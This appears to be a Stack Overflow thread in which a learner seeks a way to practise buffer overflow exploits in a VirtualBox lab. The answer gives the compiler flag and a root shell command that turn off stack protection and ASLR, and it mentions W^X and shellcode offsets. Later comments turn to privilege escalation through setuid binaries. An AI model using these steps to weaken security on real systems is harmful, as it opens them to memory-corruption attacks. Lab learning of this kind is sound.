0

I am trying to test buffer overflow attacks in virtualbox and have been struggling for the past few weeks due to all the security featrues of various distros.

I have tried following tutorials online step by step with no luck.

Rather than trying to disable all the security features, I tried getting an old linux distro but most of them don't come with gcc and lack working repositories now.

I even found a youtube video going step-by-step on Ubuntu 10.10 (which I downloaded too), including all the commands to disable the various security features and had no luck. I could get the segmentation fault but not the 'illegal instruction'.

Is there an ancient linux distro I could still download with none of this protection, which comes with gcc (or one of those huge dvd isos with a complete repository) so I can test this out?

AstroCB
  • 12,337
  • 20
  • 57
  • 73
NullPointer
  • 545
  • 1
  • 6
  • 17

1 Answers1

0

You don't need to.

Compiling an executable with the GCC flag -fno-stack-protector and turning off ASLR with sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space" disables the two main memory corruption attack mitigations in many Linux distributions. (Both of these protection technologies date back enough years to make finding a copy of an old distro time consuming, save Damn Vulnerable Linux)

It's possible on certain distributions that you'll have write xor execute memory pages, which is implemented through a number of different packages which you'll have to disable yourself. That considered, if you're not getting a stack smashing warning it's virtually certain that you don't have an executable with W^X memory pages.

This means if you're getting a segmentation fault, you've probably successfully overwritten the stored EIP on the stack and simply have your shellcode offset wrong or you've made an endianness mistake (some illegal multibyte instructions backwards are no longer illegal!). Examine your program in GDB and I think you'll see where you went wrong.

Exploring The Shellcoder's Handbook may be a profitable use of your time.

zetavolt
  • 2,989
  • 1
  • 23
  • 33
  • Thanks for the reply. I have tried -fno-stack-protector and turning off ASLR. – NullPointer Sep 08 '12 at 11:51
  • Then you need to turn off W^X pages (Called DEP on windows, for your interest). What OS are you using? – zetavolt Sep 08 '12 at 20:23
  • Thank you for the help. I managed to find Damn Vulnerable Linux and get buffer a buffer overflow to work and get a shell to spawn on it. I am trying to go one step further now escalate privileges by performing this exploit on a script with the sticky bit permission (like the passwd file). I have had no luck with this. The tutorials online say to run 'chmod u+s rootme' but the program still runs as my user. I have seen DEP in windows but did not know it was the same thing. – NullPointer Sep 12 '12 at 07:41
  • I think you need to read some more before you try to delve deeper into "hacking" – zetavolt Sep 12 '12 at 18:12
  • I just really want to get a proof of concept first. I am in 2 minds about investing more time into it after this because to actually come up with things like this, it seems you really need a deep understanding of how everything works. I have done some reading and apparently chmod u+s works on compiled programs such as my C program but was disabled for shell scripts (which does not affect me here). I would really like to know why the shell I am spawning with the buffer overflow attack is not a root shell. – NullPointer Sep 12 '12 at 23:36